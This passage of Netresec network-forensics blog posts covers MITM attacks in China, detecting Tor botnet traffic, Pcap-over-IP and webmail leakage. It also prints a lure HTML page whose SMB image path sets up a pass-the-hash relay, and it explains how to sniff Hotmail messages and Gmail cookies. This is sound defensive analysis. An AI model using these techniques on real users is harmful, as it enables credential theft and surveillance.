 9  cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms
10  2001:da8:201:[REDACTED] 147.964 ms 148.035 ms 147.895 ms
11  2001:da8:201:[REDACTED] 147.832 ms 147.881 ms 147.836 ms
12  2001:da8:201:[REDACTED] 147.809 ms 147.707 ms 147.899 ms

As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China.


Response Time Analysis

The round-trip time between the client and server can be estimated by measuring the time from when the client sends its initial TCP SYN packet to when it receives a TCP SYN+ACK from the server. The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150ms or more. However, in the captures we've analyzed the TCP SYN+ACK packet was received in just 8ms (Peking) and 52ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8ms regardless of how fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University.

Even though the machine performing the MITM was very quick at performing the TCP three-way handshake, we noticed that the application layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically sends their ServerHello response almost instantly, i.e. the response is received after one round-trip time (150ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500ms.


X.509 Certificate Analysis

The X.509 certificates were extracted from the two PCAP files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self signed for “google.com”. The fact that the MITM used a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss from the MITM'ers side since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”.

NetworkMiner 1.6.1, Files tab
Image: NetworkMiner showing list of X.509 certificates extracted from the two PCAP files

Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d
Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B

A copy of the fake certificate is available on Google drive thanks to GreatFire.org.


Conclusions

All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and www.google.com. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country.

It's difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the used method. The evidence we've observed instead indicates that the MITM attack is performed either by performing IP hijacking or by simply reconfiguring a router to forward the HTTPS traffic to a transparent SSL proxy. An alternative to changing the router config would be to add an in-line device that redirects the desired traffic to the SSL proxy. However, regardless of how they did it, the attacker would be able to decrypt and inspect the traffic going to Google.

We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical.

Posted by Erik Hjelmvik on Thursday, 04 September 2014 23:55:00 (UTC/GMT)

Tags: #MITM #GFW #PCAP #PCAPNG #Google #SSL #TLS #China

Short URL: https://netresec.com/?b=14955CB


Detecting TOR Communication in Network Traffic

The anonymity network Tor is often misused by hackers and criminals in order to remotely control hacked computers. In this blog post we explain why Tor is so well suited for such malicious purposes, but also how incident responders can detect Tor traffic in their networks.

Yellow onions with cross section. Photo taken by Andrew c

The privacy network Tor (originally short for The Onion Router) is often used by activists and whistleblowers, who wish to preserve their anonymity online. Tor is also used by citizens of countries with censored Internet (like in China, Saudi Arabia and Belarus), in order to evade the online censorship and surveillance systems. Authorities in repressive regimes are therefore actively trying to detect and block Tor traffic, which makes research on Tor protocol detection a sensitive subject.

Tor is, however, not only used for good; a great deal of the traffic in the Tor networks is in fact port scans, hacking attempts, exfiltration of stolen data and other forms of online criminality. Additionally, in December last year researchers at Rapid7 revealed a botnet called “SkyNet” that used Tor for its Command-and-Control (C2) communication. Here is what they wrote about the choice of running the C2 over Tor:

"Common botnets generally host their Command & Control (C&C) infrastructure on hacked, bought or rented servers, possibly registering domains to resolve the IP addresses of their servers. This approach exposes the botnet from being taken down or hijacked. The security industry generally will try to take the C&C servers offline and/or takeover the associated domains
[...]
What the Skynet botnet creator realized, is that he could build a much stronger infrastructure at no cost just by utilizing Tor as the internal communication protocol, and by using the Hidden Services functionality that Tor provides."


Tor disguised as HTTPS

Tor doesn't just provide encryption, it is also designed to look like normal HTTPS traffic. This makes Tor channels blend in quite well with normal web surfing traffic, which makes Tor communication difficult to identify even for experienced incident responders. As an example, here is how tshark interprets a Tor session to port TCP 443:

$ tshark -nr tbot_2E1814CCCF0.218EB916.pcap | head
1 0.000000 172.16.253.130 -> 86.59.21.38 TCP 62 1565 > 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1
2 0.126186 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
3 0.126212 172.16.253.130 -> 86.59.21.38 TCP 54 1565 > 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
4 0.127964 172.16.253.130 -> 86.59.21.38 SSL 256 Client Hello
5 0.128304 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [ACK] Seq=1 Ack=203 Win=64240 Len=0
6 0.253035 86.59.21.38 -> 172.16.253.130 TLSv1 990 Server Hello, Certificate, Server Key Exchange, Server Hello Done
7 0.259231 172.16.253.130 -> 86.59.21.38 TLSv1 252 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
8 0.259408 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [ACK] Seq=937 Ack=401 Win=64240 Len=0
9 0.379712 86.59.21.38 -> 172.16.253.130 TLSv1 113 Change Cipher Spec, Encrypted Handshake Message
10 0.380009 172.16.253.130 -> 86.59.21.38 TLSv1 251 Encrypted Handshake Message

A Tor session to TCP port 443, decoded by tshark as if it was HTTPS

The tshark output above looks no different from when a real HTTPS session is being analyzed. So in order to detect Tor traffic one will need to apply some sort of traffic classification or application identification. However, most implementations for protocol identification rely on either port number inspection or protocol specification validation. But Tor often communicates over TCP 443 and it also follows the TLS protocol spec (RFC 2246); because of this, most products for intrusion detection and deep packet inspection actually fail at identifying Tor traffic. A successful method for detecting Tor traffic is to instead utilize statistical analysis of the communication protocol in order to tell different SSL implementations apart. One of the very few tools that has support for protocol identification via statistical analysis is CapLoader.

CapLoader provides the ability to differentiate between different types of SSL traffic without relying on port numbers. This means that Tor sessions can easily be identified in a network full of HTTPS traffic.


Analyzing the tbot PCAPs from Contagio

@snowfl0w provides some nice analysis of the SkyNet botnet (a.k.a. Trojan.Tbot) at the Contagio malware dump, where she also provides PCAP files with the network traffic generated by the botnet.

The following six PCAP files are provided via Contagio:

  1. tbot_191B26BAFDF58397088C88A1B3BAC5A6.pcap (7.55 MB)
  2. tbot_23AAB9C1C462F3FDFDDD98181E963230.pcap (3.24 MB)
  3. tbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap (4.08 MB)
  4. tbot_5375FB5E867680FFB8E72D29DB9ABBD5.pcap (5.19 MB)
  5. tbot_A0552D1BC1A4897141CFA56F75C04857.pcap (3.97 MB) [only outgoing packets]
  6. tbot_FC7C3E087789824F34A9309DA2388CE5.pcap (7.43 MB)

Unfortunately the file “tbot_A055[...]” only contains outgoing network traffic. This was likely caused by an incorrect sniffer setup, such as a misconfigured switch monitor port (aka SPAN port) or failure to capture the traffic from both monitor ports on a non-aggregating network tap (we recommend using aggregation taps in order to avoid these types of problems, see our sniffing tutorial for more details). The analysis provided here is therefore based on the other five pcap files provided by Contagio.

Here is a timeline with relative timestamps (the frame timestamps in the provided PCAP files were way off anyway; we noticed an offset of over 2 months!):

  • 0 seconds : Victim boots up and requests an IP via DHCP
  • 5 seconds : Victim performs a DNS query for time.windows.com
  • 6 seconds : Victim gets time via NTP
    ---{malware most likely gets executed here somewhere}---
  • 22 seconds : Victim performs DNS query for checkip.dyndns.org
  • 22 seconds : Victim gets its external IP via an HTTP GET request to checkip.dyndns.org
  • 23 seconds : Victim connects to the Tor network, typically on port TCP 9001 or 443
    ---{lots of Tor traffic from here on}---

This is what it looks like when one of the tbot pcap files has been loaded into CapLoader with the “Identify protocols” feature activated:
CapLoader detecting Tor protocol
CapLoader with protocol detection in action - see “TOR” in the “Sub_Protocol” column

Notice how the flows to TCP ports 80, 9101 and 443 are classified as Tor? The statistical method for protocol detection in CapLoader is so effective that CapLoader actually ignores port numbers altogether when identifying the protocol. The speed with which CapLoader parses PCAP files also enables analysis of very large capture files. A simple way to detect Tor traffic in large volumes of network traffic is therefore to load a capture file into CapLoader (with “Identify protocols” activated), sort the flows on the “Sub_Protocol” column, and scroll down to the flows classified as Tor protocol.
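For a first rough pass without CapLoader, tshark can at least reveal on which ports TLS Client Hellos show up, which immediately highlights SSL-looking traffic on odd ports such as 9001 or 9101. Note that this simple check cannot tell Tor apart from ordinary HTTPS on TCP 443 the way CapLoader's statistical detection does:

$ tshark -r tbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap -Y 'ssl.handshake.type == 1' -T fields -e ip.dst -e tcp.dstport | sort | uniq -c | sort -rn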


Beware of more Tor backdoors

Most companies and organizations allow traffic on TCP 443 to pass through their firewalls without content inspection. The privacy provided by Tor additionally makes it easy for a botnet herder to control infected machines without risking his identity to be revealed. These two factors make Tor a perfect fit for hackers and online criminals who need to control infected machines remotely.

Here is what Claudio Guarnieri says about the future use of Tor for botnets in his Rapid7 blog post:

“The most important factor is certainly the adoption of Tor as the main communication channel and the use of Hidden Services for protecting the backend infrastructure. While it’s surprising that not more botnets adopt the same design, we can likely expect more to follow the lead in the future.”

Incident responders will therefore need to learn how to detect Tor traffic in their networks, not just in order to deal with insiders or rogue users, but also in order to counter malware using it as part of their command-and-control infrastructure. However, as I've shown in this blog post, telling Tor apart from normal SSL traffic is difficult. But making use of statistical protocol detection, such as the Port Independent Protocol Identification (PIPI) feature provided with CapLoader, is in fact an effective method to detect Tor traffic in your networks.

Posted by Erik Hjelmvik on Saturday, 06 April 2013 20:55:00 (UTC/GMT)

Tags: #CapLoader #TOR #Protocol Identification #SSL #TLS #HTTPS #PCAP #PIPI

Short URL: https://netresec.com/?b=13400BE


Forensics of Chinese MITM on GitHub

Great Wall of China by beggs

On January 26 several users in China reported SSL problems while connecting to the software development site GitHub.com. The reports indicated that the Great Firewall of China (GFW) was used to perform a Man-in-the-Middle (MITM) attack against users in China who were visiting GitHub. This attack was most likely conducted in order to track which users were reading or contributing to the list of persons behind the GFW, which is hosted on GitHub.

There is a good writeup on the attack by GreatFire.org, which says:

”At around 8pm, on January 26, reports appeared on Weibo and Twitter that users in China trying to access GitHub.com were getting warning messages about invalid SSL certificates. The evidence, listed further down in this post, indicates that this was caused by a man-in-the-middle attack.
[...]
It was very crude, in that the fake certificate was signed by an unknown authority and bound to be detected quickly. The attack stopped after about an hour.”

SSL error at github.com by bitinn
Screenshot of SSL error at github.com by @bitinn

An important part of evidence, which was used in the coverage of this incident, was a packet capture file named github.pcapng that was anonymously uploaded to CloudShark.

A self-signed X.509 certificate file, named github.com.crt, was also used as evidence. It is, however, easy to extract X.509 certificates from PCAP files, so the github.com.crt file might come from the github.pcapng capture file at CloudShark.

We have no reason not to trust the reports coming from users in China, who have been victims of this MITM attack. However, in the spirit of “Trust, but verify” I decided to perform some network forensic analysis on the capture file. More specifically I set out to answer the following questions:

Q1 : Is the user a victim of a real attack rather than having staged and recorded a MITM attack set up by himself?
Q2 : Is the user located in China?
Q3 : What can we say about the technology being used for the MITM?

Time-to-Live Analysis

My first step was to load the PcapNG file from CloudShark in CapLoader:

File > Open URL > Enter:
http://www.cloudshark.org/captures/cbdd11b20a5c/download

CapLoader with github.pcapng loaded

The “Hosts” tab shows that the capture file only contained traffic between two network hosts; the user's machine and the GitHub server. I also noticed that the GitHub server (207.97.227.239) had an IP TTL of 58 and TCP Window Size of 5840. These values are a typical indication of the host being a Linux machine (see our passive OS fingerprinting blog post for more details). However, when connecting to GitHub.com from here (Sweden) the same server has an IP TTL of 128 and Window Size 64240. This looks more like a Windows machine, and is significantly different from what the Chinese user got.

It can also be noted that a TTL of 58, which the Chinese user got, would mean that the SSL connection was terminated just six router hops away from the user. However, a traceroute from ihep.ac.cn (in Beijing, China) to github.com requires a whopping 16 hops. Additionally, this traceroute hasn't even left Beijing after six hops.

traceroute to 207.97.227.239 (207.97.227.239), 30 hops max, 38 byte packets
1 gw (202.38.128.2) 0.231 ms 0.175 ms 0.178 ms
2 202.122.36.1 (202.122.36.1) 0.719 ms 0.626 ms 0.652 ms
3 192.168.1.25 (192.168.1.25) 0.509 ms 0.485 ms 0.459 ms
4 8.131 (159.226.253.77) 0.516 ms 0.488 ms 0.496 ms
5 8.198 (159.226.253.54) 11.981 ms 0.913 ms 0.829 ms
6 8.192 (159.226.254.254) 40.477 ms 40.614 ms 40.524 ms
7 Gi6-0.gw2.hkg3.asianetcom.net (203.192.137.173) 53.062 ms 40.610 ms 40.617 ms
8 te0-3-0-0.wr1.hkg0.asianetcom.net (61.14.157.249) 42.459 ms 43.133 ms 43.765 ms
9 te0-1-0-0.wr1.osa0.asianetcom.net (61.14.157.58) 76.603 ms 76.586 ms 76.648 ms
10 gi6-0-0.gw1.sjc1.asianetcom.net (61.14.157.98) 195.939 ms 195.934 ms 196.090 ms
11 ip-202-147-50-250.asianetcom.net (202.147.50.250) 180.966 ms 181.058 ms 181.339 ms
12 dcx2-edge-01.inet.qwest.net (67.14.28.70) 342.431 ms 340.882 ms 338.639 ms
13 67.133.246.158 (67.133.246.158) 253.975 ms 253.407 ms 253.742 ms
14 vlan905.core5.iad2.rackspace.net (72.4.122.10) 253.468 ms 252.947 ms 253.639 ms
15 aggr301a-1-core5.iad2.rackspace.net (72.4.122.121) 253.767 ms 253.862 ms 253.010 ms
16 github.com (207.97.227.239) 254.104 ms 253.789 ms 253.638 ms

MAC Address

NetworkMiner with PCAP file from GitHub MITM loaded

As shown in the NetworkMiner screenshot above, the Ethernet MAC address of the client's default gateway is ec:17:2f:15:23:b0, which indicates that the user's router was a device from TP-LINK. TP-LINK is a large provider of networking devices who make more than half of their sales within China. This supports the theory that the user was located in China.

PcapNG Metadata

As we've mentioned in a previous blog post, PcapNG files can contain a great deal of metadata. I therefore wrote a simple parser to extract all the juicy metadata that was available in the github.pcapng file that was anonymously uploaded to CloudShark. The metadata revealed that the user was running “64-bit Windows 7 Service Pack 1, build 7601” and sniffing with “Dumpcap 1.8.2 (SVN Rev 44520 from /trunk-1.8)”, which normally means that Wireshark 1.8.2 was being used (since it uses dumpcap for all packet capturing tasks).
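Recent versions of the capinfos tool that ships with Wireshark can show parts of this PcapNG metadata as well, in case you don't feel like writing your own parser (older capinfos builds may not print the operating system and capture application fields):

$ capinfos github.pcapng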

The PcapNG file additionally contained a great deal of Name Resolution Blocks, i.e. cached DNS entries. Among these entries was an entry that mapped the IP 10.99.99.102 to the hostname “SHAOJU-IPAD.local”. So why was there a name resolution entry for an IP address that wasn't part of the capture file? Well, cached name resolution entries aren't properly cleaned from PcapNG files written with Wireshark 1.8.0 to 1.8.3 due to a vulnerability discovered by Laura Chappell.

So, who is “Shaoju”? Well, a Google query for shaoju github will bring you to the GitHub user Chen Shaoju, who also tweeted a screenshot of the SSL error he received when accessing GitHub.com.

SSL error received by Chen Shaoju when accessing GitHub.com

Conclusions

Q1 : Is the user a victim of a real attack rather than having staged and recorded a MITM attack set up by himself?
A1 : Yes, this is most likely a REAL attack. I'd find it unlikely that a user trying to fake such a MITM attack would use an environment with six router hops between the client and MITM machine.
Q2 : Is the user located in China?
A2 : Yes, I'm convinced that the PcapNG file was sniffed by Chen Shaoju, who lives in Wuxi, China according to his GitHub profile.
Q3 : What can we say about the technology being used for the MITM?
A3 : The fact that the MITM machine was six hops away from the user indicates that the MITM is taking place at some fairly central position in China's internet infrastructure, as opposed to being done locally at the ISP. Additionally, the machine doing the MITM seems to be running Linux and having an initial IP TTL of 64 and a TCP Window Size of 5840.


UPDATE (February 5) : Privacy / Anonymity

The fact that this blog post reveals the identity of the anonymous github.pcapng uploader seems to have caused some reactions online.

I did, however, contact Chen Shaoju before publishing this blog post. In fact, I even sent him an email as soon as we discovered that it was possible to identify him through the capture file's metadata. Here's what I wrote:

“I'm working on a blog post about the GitHub pcap file on CloudShark. My analysis indicates that you sniffed the traffic. Is it OK with you if I publish this blog post?

If not, then I'd recommend that you remove the pcap file from couldshark in order to prevent others from identifying you via your pcap file.”
Shaoju responded the same day and said it was OK.

Once the text for the blog post was finished I also sent him a copy for verification before we published it online. Again, Shaoju responded swiftly and said that it looked good.

Also, I'm sure that Shaoju (@chenshaoju) can confirm that this blog post was published with his consent.

Finally, I'd like to add a few recommendations to users who wish to preserve their anonymity when sharing capture files:

  1. Filter out any traffic that isn't relevant to what you wish to share. CapLoader is a handy tool for selecting and filtering capture files based on flows or IP addresses.
  2. Save the capture file in the old libpcap (PCAP) format or convert your PcapNG file to PCAP format. This will remove the metadata available in Pcap-NG option fields.
  3. Anonymize frame headers, i.e. Ethernet MAC addresses or even IP addresses (if needed), with a tool like tcprewrite, Bit-Twist or TraceWrangler (a quick sketch follows below).
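As a quick sketch of points 2 and 3, the PcapNG-to-PCAP conversion can be done with editcap and a crude MAC anonymization with tcprewrite (the file names and MAC addresses below are just examples, and this simplistic tcprewrite invocation sets the same source and destination MAC on every frame):

$ editcap -F libpcap original.pcapng converted.pcap
$ tcprewrite --infile=converted.pcap --outfile=anonymized.pcap --enet-smac=00:00:00:00:00:01 --enet-dmac=00:00:00:00:00:02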

Posted by Erik Hjelmvik on Saturday, 02 February 2013 22:10:00 (UTC/GMT)

Tags: #GitHub #PcapNG #China #GFW #Forensics #MITM #SSL

Short URL: https://netresec.com/?b=1328C6B


Pcap-over-IP in NetworkMiner

Pcap over IP network protocol stack

Version 1.1 of NetworkMiner is soon to be released by us at Netresec. I would therefore like to give you a sneak preview of a simple yet very useful feature that we've added. We call this new feature “Pcap-over-IP”, which is a name originally coined by Packet Forensics.

With Pcap-over-IP you can have NetworkMiner read a pcap file (or libpcap formatted data in general) over a TCP socket instead of getting it via the file system. The easiest way to send a pcap file over a TCP socket is to pipe it to netcat like this:

# cat sniffed.pcap | nc 192.168.1.20 57012

In this example I'd be running NetworkMiner on a PC with IP 192.168.1.20 and have Pcap‑over‑IP listening to TCP port 57012. NetworkMiner will save the received packets to disk as well as parse and display the contents of the packets in the GUI when receiving the Pcap‑over‑IP stream.

NetworkMiner receiving Pcap-over-IP data
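
The receiving end doesn't have to be NetworkMiner, by the way. Since a Pcap-over-IP stream is just raw libpcap data over TCP, you can store it to disk with a plain netcat listener (a minimal sketch, assuming traditional netcat syntax; OpenBSD netcat uses “nc -l 57012” instead):

# nc -l -p 57012 > received.pcap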

Pcap-over-IP also allows me to do live network sniffing with dumpcap from my local Windows machine and pipe the captured packets to NetworkMiner via a TCP socket, using Netcat for Windows like this:

C:\Program Files\Wireshark>dumpcap -i 4 -P -w - | C:\Tools\Netcat\nc.exe 127.0.0.1 57012

Note that the “-w -” switch tells dumpcap to push the raw libpcap formatted data to standard output (stdout) rather than saving it to a pcap file.

The reason for using dumpcap to perform the live sniffing, rather than relying on the built-in packet capturing functionality of NetworkMiner, is that dumpcap is an extremely reliable tool when it comes to capturing packets. By sniffing with dumpcap instead of NetworkMiner you therefore minimize the risk of dropping packets.

I can also use Pcap-over-IP to capture network traffic from a remote PC or device. I can, for example, use tcpdump to sniff traffic on the external interface of my Linux-based firewall and push it to an analyst station like this:

# tcpdump -i eth1 -s 0 -U -w - | nc 192.168.1.20 57012

I can also perform remote WiFi sniffing with dumpcap or tcpdump from a Linux machine and send the sniffed packets to NetworkMiner with netcat like this:

# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 4
# dumpcap -i wlan0 -P -w - | nc 192.168.1.20 57012

It is even possible to receive multiple Pcap-over-IP streams simultaneously with NetworkMiner. This way I could have 14 dumpcap or tcpdump processes sniffing one IEEE 802.11 channel each, while monitoring all the captured traffic in real time with a single instance of NetworkMiner. Note, however, that this would require 14 sniffer computers or a single sniffer machine with 14 WiFi cards (see the sketch below).
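
On a single machine with 14 monitor-mode capable WiFi interfaces, those sniffer processes could be started with a small shell loop roughly like this (just a sketch; the interface names and the channel-to-interface mapping are assumptions, while 192.168.1.20:57012 is the analyst station from the examples above):

for ch in $(seq 0 13); do
  iwconfig wlan$ch mode monitor
  iwconfig wlan$ch channel $((ch + 1))
  dumpcap -i wlan$ch -P -w - | nc 192.168.1.20 57012 &
done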

SSL encryption

Don't like sending your pcap files in cleartext over the network? That's just fine; we've also implemented support for SSL/TLS encryption in NetworkMiner. You can use the great multipurpose relay tool socat to read your pcap file and have it encrypted with SSL while in transit over the network, like this:

# socat GOPEN:sniffed.pcap SSL:192.168.1.20:57013,verify=0

You can also use socat when doing live sniffing like this:

# tcpdump -i br0 -s 0 -U -w - | socat - SSL:192.168.1.20:57013,verify=0
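
For the sake of completeness: if you'd rather terminate the SSL connection outside of NetworkMiner, socat can be used on the receiving analyst station as well, decrypting the stream and forwarding it to a local cleartext Pcap-over-IP port (a sketch only; the certificate file name is an assumption):

# socat OPENSSL-LISTEN:57013,reuseaddr,cert=server.pem,verify=0 TCP:127.0.0.1:57012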

Warning: Always make sure you don't sniff your own Pcap-over-IP stream when sending packets to NetworkMiner. You would otherwise create a feedback loop, which will fill up the tubes. If you need to sniff the same interface that is used for the Pcap-over-IP transfer, then make sure to apply a BPF filter that excludes the Pcap-over-IP port number, like this:

# tcpdump -i ppp0 -U -w - not port 57012 | nc 192.168.1.20 57012

UPDATE June 16, 2014

With the release of NetworkMiner 1.6 we've made the PCAP‑over‑IP functionality available in the free open source edition of NetworkMiner. We have also integrated PCAP‑over‑IP into NetworkMinerCLI, i.e. the command line version of NetworkMiner Professional.

Posted by Erik Hjelmvik on Wednesday, 07 September 2011 09:22:00 (UTC/GMT)

Tags: #Netresec #Pcap-over-IP #Pcap #tcpdump #dumpcap #TCP #SSL #TLS

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=119B126


Webmail Information Leakage

Switching from unencrypted HTTP to encrypted HTTPS is a good move in order to help the users of a website protect their privacy online. Many webmail providers have therefore started rolling out their encrypted services during the past few years. Google announced their optional “always use https” setting back in 2008 and also provided some guidance as to why it was important to use HTTPS:

Https keeps your mail encrypted as it travels between your web browser and our servers, so someone sharing your favorite coffee shop's public wifi can't read it.

It took Microsoft Hotmail until November 2010 to announce their optional support for HTTPS encryption, which users could activate by visiting https://account.live.com/ManageSSL.

Adding the option to manually turn on encryption seems to satisfy most people in the security community, probably since it enables us geeks to protect our privacy online through encryption. But the majority of webmail users are not aware of the risk of having their traffic sniffed, nor do they know how to turn the encryption feature on. Encryption must therefore be turned on by default in order to protect the broad mass of webmail users.

An open letter written by several well-known security experts, such as Jacob Appelbaum, Richard Clayton, Roger Dingledine, RSnake, Jeff Moss, Ronald L. Rivest and Bruce Schneier, was sent to Google in June 2009. In the letter the authors requested that Google turn on encryption as part of the default settings:

Rather than forcing users of Gmail, Docs and Calendar to “opt-in” to adequate security, Google should make security and privacy the default.

The letter also mentioned that other competing webmail providers had even worse security since they didn't even provide any “opt-in” encryption at that time:

Google is not the only Web 2.0 firm which leaves its customers vulnerable to data theft and account hijacking. Users of Microsoft Hotmail, Yahoo Mail, Facebook and MySpace are also vulnerable to these attacks. Worst of all – these firms do not offer their customers any form of protection.

But how many of the major webmail providers actually provide HTTPS as the default protocol today? In this blog post we will take a closer look at two major webmail services: Gmail and Hotmail.

GMAIL

Just like most other webmail services, Google's Gmail uses HTTPS to encrypt the username and password during login. But Gmail now also provides encryption by default after the user has logged in. This prevents hackers as well as investigators/analysts from extracting sent emails by sniffing network traffic.

Hackers have, on the other hand, been able to take over other users' logged-in Gmail sessions for some time by sniffing the GX cookie and using it to fool Gmail into believing that they are logged into the victim's account. Google has now mitigated this issue by adding encryption and setting the GX cookie to “Secure connections only”, which means it will only be sent in HTTPS sessions.

There is, however, another cookie parameter used by Gmail that is allowed to be sent across an unencrypted HTTP session. This cookie is called “gmailchat” and is typically submitted when visiting http://mail.google.com/mail. This cookie parameter is picked up by NetworkMiner and displayed on both the Credentials tab and the Parameters tab.

gmailchat parameter

The client IP address, login time and Gmail account found in a gmailchat cookie can be used as evidence by an analyst in order to determine which person was using a particular computer at a particular time.
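
For those who prefer command line tools, the same cookie values can be pulled out of a capture file with a tshark one-liner roughly like the one below (a sketch; the capture file name is an assumption and older tshark versions use -R instead of -Y for display filters):

# tshark -r gmail-session.pcap -Y 'http.cookie contains "gmailchat"' -T fields -e ip.src -e http.cookie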

HOTMAIL

The security of Hotmail is much worse than that of Gmail. With default settings only the login is protected with encryption; everything after that is sent as cleartext HTTP. This makes it possible to extract emails sent with Hotmail just by passively sniffing the network traffic of a logged-in Hotmail user. In our recent “TCP/IP Weapons School” blog post we showed how NetworkMiner displays extracted emails in the Messages tab, and this feature works just as well with Hotmail traffic. Loading a pcap with Hotmail web traffic into NetworkMiner gives you something like this:

Extracted Hotmail message

You can also use the Parameters tab to look for the parameter names “fFrom”, “fTo”, “fSubject” and “fMessageBody”, and thereby manually extract who sent and received the email as well as read its subject and message body. These parameters are all sent in an unencrypted HTTP POST to mail.live.com.
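
If you just want to grep for these fields directly in a capture file, without loading it into NetworkMiner, something like the following ngrep command should do the trick (a sketch; the capture file name is an assumption):

# ngrep -q -I hotmail.pcap "fMessageBody" "tcp port 80"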

So if you're using Hotmail or Windows Live Mail, make sure to visit https://account.live.com/ManageSSL and enable the encryption functionality!

Posted by Erik Hjelmvik on Saturday, 12 February 2011 15:01:00 (UTC/GMT)

Tags: #Hotmail #SSL #HTTPS #NetworkMiner

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=112B58E


Analyzing the TCP/IP Weapons School Sample Lab

Richard Bejtlich published a sample lab from his TCP/IP Weapons School class two years ago. I haven't yet had the opportunity to take this class, but I have taken a look at the pcap file that Bejtlich included in this sample lab.

The introduction provided to this lab in the Student Workbook outlines the incident:

Samantha is back with another potential security incident. She said she received another email from her friend Samuel that resulted in suspicious computer activity. She clicked on a URL but didn’t see anything interesting. Again she wonders if her computer was "hacked".

I decided to load the pcap file into NetworkMiner to see what it can unveil.

The "Messages" tab in NetworkMiner provides quick access to the email Samantha received:

NetworkMiner Professional 1.0 Messages tab showing extracted email

The message body of the email says:

Hi Samantha,

Sorry that last link didn't work. Here is a new cool Web page!

Samuel

Attached to the email is also a file called “cool_web_page.html” (see the “filename” attribute in the screenshot above). This file was automatically reassembled and extracted to disk by NetworkMiner when the pcap file was loaded. The easiest way to locate the file is to open the “Files” tab, sort on filename and scroll down to “cool_web_page.html”. Right-clicking the file and selecting “Open folder” causes NetworkMiner to open the folder where the file was extracted.

Warning: it is almost never a good idea to select “Open file” in NetworkMiner, since that would cause the potentially malicious file to be executed. Only use this option if you are absolutely sure that the extracted file isn't malicious, or if you want to perform behavioral analysis of the malicious code in a sandboxed environment.

The contents of the cool web page are:

<HTML>
<BODY>
<TITLE>Why do you open these links?!?</TITLE>
<IMG SRC="\\10.1.1.6\share2\1.jpg">
<H1>Boo!</H1>
</BODY>
</HTML>

This sure looks fishy to me, since the image tag tells the browser to load an image from an SMB network share rather than from a web server. Luckily NetworkMiner parses the SMB (a.k.a. CIFS) protocol, so any file that has been transferred over SMB will show up in the Files tab. No SMB file transfer can be seen there, though. The “Sessions” tab, on the other hand, confirms that there has been SMB communication between Samantha's computer (192.168.230.4) and the suspicious machine with IP 10.1.1.6.

Note: NetworkMiner displays the SMB protocol as “NetBiosSessionService”, which is the underlying protocol that provides the session layer for SMB.

NetworkMiner Professional 1.0 Sessions tab with SMB session

Interestingly enough, we see not only an SMB session from Samantha's computer to the suspicious machine, but also a second SMB session where the suspicious machine connects back to Samantha's computer. This is odd, and it makes me suspect that an SMB relay attack (MITM + pass-the-hash) could have been performed. A quick look at the Credentials tab confirms this suspicion, since the exact same credentials that are sent from Samantha's computer (user account “samantha” and an HMAC) are replayed by the suspicious machine back to Samantha's computer. Hence the suspicious machine is authenticating itself to Samantha's computer using her own credentials.

NetworkMiner Professional 1.0 Credentials tab with NTLMv2 login

This is pretty much as far as I could get by using only NetworkMiner. To see what actions the attacker took after performing the pass-the-hash attack, one would have to look at the network traffic at the packet level (with, for example, Wireshark, tshark or tcpdump). Doing so reveals, among other things, a failed attempt at accessing the IPC$ share on Samantha's computer.
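
The SMB tree connect to the IPC$ share can, for instance, be located with a tshark display filter roughly like this (a sketch; the capture file name is an assumption and older tshark versions use -R instead of -Y):

# tshark -r tws_sample_lab.pcap -Y 'smb.path contains "IPC$"'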

This blog post could have ended here, but I also discovered some interesting extra information when analyzing Bejtlich's TCP/IP Weapons School capture file. There were multiple SSL sessions in the pcap, most of them using the standard TCP port 443. But the protocol identification functionality in NetworkMiner Professional also identified some SSL sessions going to servers on TCP ports 9001 and 8192. To me these SSL sessions look very much like TOR traffic. The encryption in TOR is actually designed to mimic the TLS handshake of Firefox+Apache, but it uses self-signed certificates rather than certificates signed by a trusted CA.

NetworkMiner extracts all certificates used in the SSL handshakes to disk, so it is easy to inspect them by looking in the Files tab. Just sort the files on the Protocol column and look for “TlsCertificate” in order to quickly locate the extracted certificates.

NetworkMiner Professional 1.0 Files tab with extracted TOR/SSL certificates
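
The extracted certificate files can also be examined on the command line with OpenSSL, for example like this (assuming the extracted .cer file is DER encoded; the file name is just a placeholder):

# openssl x509 -inform DER -in extracted_certificate.cer -noout -text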

Posted by Erik Hjelmvik on Saturday, 15 January 2011 14:37:00 (UTC/GMT)

